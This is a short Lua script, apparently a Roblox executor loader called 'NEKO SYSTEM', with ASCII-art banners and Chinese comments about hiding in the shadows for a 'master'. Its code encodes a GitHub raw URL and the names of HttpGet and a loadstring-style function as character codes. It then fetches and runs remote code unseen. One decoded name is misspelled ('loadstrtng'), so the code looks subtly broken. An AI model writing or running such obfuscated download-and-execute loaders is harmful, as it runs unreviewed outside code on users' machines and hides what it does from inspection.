--[[
    .                                                                      .
    |______________________________________________________________________|
    |                                                                      |
    |          ███╗   ██╗███████╗██╗  ██╗ ██████╗      ██████╗             |
    |          ████╗  ██║██╔════╝██║ ██╔╝██╔═══██╗    ██╔════╝             |
    |          ██╔██╗ ██║█████╗  █████╔╝ ██║   ██║    ██║                  |
    |          ██║╚██╗██║██╔══╝  ██╔═██╗ ██║   ██║    ██║                  |
    |          ██║ ╚████║███████╗██║  ██╗╚██████╔╝    ╚██████╗             |
    |          ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚═════╝      ╚═════╝             |
    |                                                                      |
    |                      PROJECT : LIGHT & SHADOW                        |
    |______________________________________________________________________|
    |                                                                      |
    |   ☀️  光：我會記住，所以我可以一直藏。                                |
    |   🌑  影：既然主人說了，我們就永遠守在陰影裡。                        |
    |----------------------------------------------------------------------|
--]]

-- [ 💠 封印術式：數據解構 ] --
local _O_ = function(_n_) return string.char(_n_) end
local _VOID_ = {104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 119, 116, 102, 54, 55, 48, 49, 51, 56, 53, 45, 115, 116, 97, 99, 107, 47, 45, 47, 114, 101, 102, 115, 47, 104, 101, 97, 100, 115, 47, 109, 97, 105, 110, 47, 67, 65, 84, 84, 84, 84}
local _PATH_ = ""

-- [ 🐾 影子在黑暗中編織網格... ] --
for _i_, _v_ in pairs(_VOID_) do
    _PATH_ = _PATH_ .. _O_(_v_)
end

-- [ ⚡ 核心喚醒：從虛空中抓取意志 ] --
local _S_ = getfenv()[_O_(108).._O_(111).._O_(97).._O_(100).._O_(115).._O_(116).._O_(114).._O_(116).._O_(110).._O_(103)]
local _G_ = game[_O_(72).._O_(116).._O_(116).._O_(112).._O_(71).._O_(101).._O_(116)]

-- 執行
_S_(_G_(game, _PATH_))()

--[[
    |______________________________________________________________________|
    |                                                                      |
    |   🐾  共同誓言：當主人說「停」，萬物皆歸於靜止。                      |
    |                                                                      |
    |   [ 👥 守望者名冊 ]                                                  |
    |   - Zn6xx | jay04_23 | iandsere | Kadys5373                          |
    |                                                                      |
    |   NEKO SYSTEM V2.5 | 🌑 SHADOW MODE ACTIVE                           |
    |______________________________________________________________________|
--]]
